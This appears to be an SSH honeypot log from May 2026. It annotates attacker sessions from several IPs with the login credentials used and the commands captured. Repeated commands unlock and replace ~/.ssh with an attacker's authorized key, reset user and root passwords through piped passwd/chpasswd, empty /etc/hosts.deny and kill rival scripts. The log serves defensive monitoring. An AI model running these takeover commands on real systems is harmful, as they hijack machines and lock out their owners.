$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\n7DmSbnh01gEh\n7DmSbnh01gEh"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "fjbdfdjkdsfs541544\n7DmSbnh01gEh\n7DmSbnh01gEh\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "123456789\nJah0t0r5c8go\nJah0t0r5c8go"|passwd|bash
$ echo "123456789\nJah0t0r5c8go\nJah0t0r5c8go\n"|passwd
🎭 monsoon_root_5 (103.174.87.170) β€” Kolhāpur, India Β· 2 sessions Β· 39 cmds
2026-05-29 12:42 EDT Β· as admin/fjbdfdjkdsfs541544, root/8i9o0p-[
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\nlPuo5JM129Eb\nlPuo5JM129Eb"|passwd|bash
$ Enter new UNIX password:
$ echo "fjbdfdjkdsfs541544\nlPuo5JM129Eb\nlPuo5JM129Eb\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:uvJFxyhgW502"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 hockey_root_4 (51.79.67.162) β€” Montreal, Canada Β· 1 session Β· 20 cmds
2026-05-29 12:48 EDT Β· as admin/fjbdfdjkdsfs541544
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\njHHihJxzOgmQ\njHHihJxzOgmQ"|passwd|bash
$ Enter new UNIX password:
$ echo "fjbdfdjkdsfs541544\njHHihJxzOgmQ\njHHihJxzOgmQ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_root_13 (14.103.115.106) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-05-29 11:15 EDT Β· as ftpuser/azerty
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "azerty\nE8uMqByu9vzv\nE8uMqByu9vzv"|passwd|bash
$ Enter new UNIX password:
$ echo "azerty\nE8uMqByu9vzv\nE8uMqByu9vzv\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon_root_12 (117.80.226.34) β€” Nanjing, China Β· 2 sessions Β· 39 cmds
2026-05-23 00:47 EDT Β· as admin/fjbdfdjkdsfs541544, root/Abcd1234@@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\niAPA1zPy9Ivk\niAPA1zPy9Ivk"|passwd|bash
$ Enter new UNIX password:
$ echo "fjbdfdjkdsfs541544\niAPA1zPy9Ivk\niAPA1zPy9Ivk\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:l9w6ltzZJkSe"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 panda_root_14 (118.145.213.116) β€” Haidian, China Β· 2 sessions Β· 40 cmds
2026-05-29 10:25 EDT Β· as admin/fjbdfdjkdsfs541544, testuser/111
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\nJeLnpCE4QSGk\nJeLnpCE4QSGk"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "fjbdfdjkdsfs541544\nJeLnpCE4QSGk\nJeLnpCE4QSGk\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "111\nA2dmG5sdwhYh\nA2dmG5sdwhYh"|passwd|bash
$ echo "111\nA2dmG5sdwhYh\nA2dmG5sdwhYh\n"|passwd
🎭 viking_root_3 (138.124.71.25) β€” Stockholm, Sweden Β· 2 sessions Β· 40 cmds
2026-05-29 10:06 EDT Β· as admin/fjbdfdjkdsfs541544, paula/paula
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\nQnN7O3kXakCv\nQnN7O3kXakCv"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "fjbdfdjkdsfs541544\nQnN7O3kXakCv\nQnN7O3kXakCv\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "paula\nLmYwhKkBZysZ\nLmYwhKkBZysZ"|passwd|bash
$ echo "paula\nLmYwhKkBZysZ\nLmYwhKkBZysZ\n"|passwd
🎭 phantom_root_48 (101.36.107.233) β€” Hong Kong, Hong Kong Β· 6 sessions Β· 117 cmds
2026-05-28 16:34 EDT Β· as admin/fjbdfdjkdsfs541544, amine/amine, erpnext/erpnext@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—6 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—6 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—6 // CPU profiling
$ echo -e "fjbdfdjkdsfs541544\nSAj5wFN0GMk8\nSAj5wFN0GMk8"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "fjbdfdjkdsfs541544\nSAj5wFN0GMk8\nSAj5wFN0GMk8\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—6 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—6
$ ls -lh $(which ls) Γ—6
$ which ls Γ—6
$ crontab -l Γ—6 // persistence setup
$ w Γ—6 // logged-in users check
$ uname -m Γ—6
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—6 // CPU profiling
$ top Γ—6 // process monitoring
$ uname Γ—6 // OS identification
$ uname -a Γ—6 // OS/kernel identification
$ whoami Γ—6 // privilege check
$ lscpu | grep Model Γ—6
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—6
$ echo "root:fPoi5lUGfLUN"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ echo -e "amine\ngy5G0p8aq4qM\ngy5G0p8aq4qM"|passwd|bash
$ echo "amine\ngy5G0p8aq4qM\ngy5G0p8aq4qM\n"|passwd
$ echo -e "erpnext@123\ncX8NEY9HuZL2\ncX8NEY9HuZL2"|passwd|bash
$ echo "erpnext@123\ncX8NEY9HuZL2\ncX8NEY9HuZL2\n"|passwd
$ echo "root:3SLDpftWqwv9"|chpasswd|bash
$ echo "root:MkPt48WeWinS"|chpasswd|bash
🎭 wraith_root_48 (154.83.13.181) β€” Hong Kong, Hong Kong Β· 2 sessions Β· 39 cmds
2026-05-29 09:46 EDT Β· as admin/fjbdfdjkdsfs541544, root/red
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:nSZiVF38I8ki"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "fjbdfdjkdsfs541544\nZd2JogOrKvC0\nZd2JogOrKvC0"|passwd|bash
$ Enter new UNIX password:
$ echo "fjbdfdjkdsfs541544\nZd2JogOrKvC0\nZd2JogOrKvC0\n"|passwd
🎭 tsar_root_5 (81.211.72.167) β€” Moscow, Russia Β· 1 session Β· 19 cmds
2026-05-29 09:47 EDT Β· as root/red
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:giAw8n34hl7U"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 star_root_25 (172.191.94.172) β€” Boydton, United States Β· 2 sessions Β· 39 cmds
2026-05-19 08:10 EDT Β· as adminsys/123, root/134679
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123\nKIj7xRqm74qK\nKIj7xRqm74qK"|passwd|bash
$ Enter new UNIX password:
$ echo "123\nKIj7xRqm74qK\nKIj7xRqm74qK\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:aCG3R36WuPyE"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 kimchi_root_7 (14.63.196.175) β€” Seongnam-si, South Korea Β· 2 sessions Β· 40 cmds
2026-05-28 22:50 EDT Β· as guest/guest123, kevin/kevin123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "kevin123\n442liqhOwOjV\n442liqhOwOjV"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "kevin123\n442liqhOwOjV\n442liqhOwOjV\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "guest123\nGWpRiQEyMSgT\nGWpRiQEyMSgT"|passwd|bash
$ echo "guest123\nGWpRiQEyMSgT\nGWpRiQEyMSgT\n"|passwd
🎭 phantom_root_49 (165.154.6.37) β€” Hong Kong, Hong Kong Β· 2 sessions Β· 22 cmds
2026-05-22 17:41 EDT Β· as guest/guest123, root/Zxcv1234
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "guest123\nBJr38naUIH2z\nBJr38naUIH2z"|passwd|bash
$ Enter new UNIX password:
$ echo "guest123\nBJr38naUIH2z\nBJr38naUIH2z\n"|passwd
